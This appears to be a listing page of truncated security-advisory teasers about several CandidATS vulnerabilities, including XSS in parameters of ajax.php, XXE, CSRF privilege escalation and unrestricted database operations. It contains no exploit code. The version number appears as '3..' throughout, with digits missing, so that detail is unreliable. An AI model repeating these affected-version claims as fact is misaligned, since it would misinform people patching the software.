"CVE-2022-42744: Unrestricted CRUD Operations in CandidATS 3.. Leads to Database Compromise"
Overview: CandidATS version 3.. has a security vulnerability that allows external attackers to perform Create, Read, Update, and Delete (CRUD) operations on application databases. The
CVE-2022-42748: Cross-Site Scripting Vulnerability in CandidATS 3..'s 'sortDirection' Parameter in 'ajax.php'
A recent vulnerability, identified as CVE-2022-42748, found in CandidATS version 3.. on the 'sortDirection' parameter of the 'ajax.php' resource, allows
CVE-2022-42747: Unauthenticated XSS Vulnerability in CandidATS 3.. through 'sortBy' of the 'ajax.php' Resource
A critical security vulnerability has been identified in CandidATS version 3... This vulnerability (CVE-2022-42747) allows an unauthenticated external attacker to steal the cookie of arbitrary
CVE-2022-42745 Exploiting XXE in CandidATS 3.. to Read Arbitrary Files
CandidATS, an open source Applicant Tracking System, is widely used by organizations to manage the recruitment process. Recently, a security vulnerability, CVE-2022-42745, has been discovered
CVE-2022-42751: Critical Privilege Escalation in CandidATS (v3..) Leveraging CSRF Vulnerabilities - Exploit Details, PoC, and Remediation
CandidATS, a popular open-source Applicant Tracking System (ATS) is reportedly affected by a high-impact Critical Privilege Escalation vulnerability (CVE-2022-42751) found in version 3... The vulnerability
Episode
00:00:00
00:00:00